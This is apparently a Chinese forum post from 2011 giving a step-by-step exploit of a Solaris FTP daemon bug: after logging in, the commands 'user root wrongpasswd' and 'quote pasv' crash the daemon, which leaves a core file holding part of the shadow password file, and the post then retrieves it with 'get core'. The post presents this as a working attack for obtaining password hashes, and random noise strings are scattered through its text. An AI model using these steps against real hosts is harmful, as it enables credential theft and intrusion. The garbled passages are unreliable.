該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG���,使得用戶可以獲得該機的口令文件。具體過程如下:/ X$ c* R/ X+ D) w% L( N
3 v5 x% a* B+ ?/ K1.通過 ftp 正常登錄到目的主機上
, C- w" Z3 W2 X% k; b9 r9 t0 C, F2 M4 [) B) ~3 A+ z M% M
2.輸入如下命令序列:* o3 t& D& J! |; N D+ W1 d2 C
0 y( t( `* J4 yftp> user root wrongpasswd
- E* r8 M) [' U0 m4 m4 H
9 v, Y2 D5 j: m; [' x* ^ftp> quote pasv! c' x$ \7 G9 n5 E
0 M0 e" M% v; o, {3 W6 ^2 `4 h3.這時�����,ftpd會報錯退出��,同時會在當(dāng)前目錄下生成一個core��,口令文件就包含在這個core中�����。3 G- U& S! @$ G# I" F
7 M0 y" m9 a5 [1 H4 y; P! O: U
4.再次進入FTP >get core @( x# P# F; v1 u" l
3 _ K0 W; d& D" m- f5 C( M" h3 u補充:雖然在core只有一部分shadow�,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了
# J+ D% \( z4 r. }5 `6 Y6 T- W3 L/ ~ W' R3 L- L6 p
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡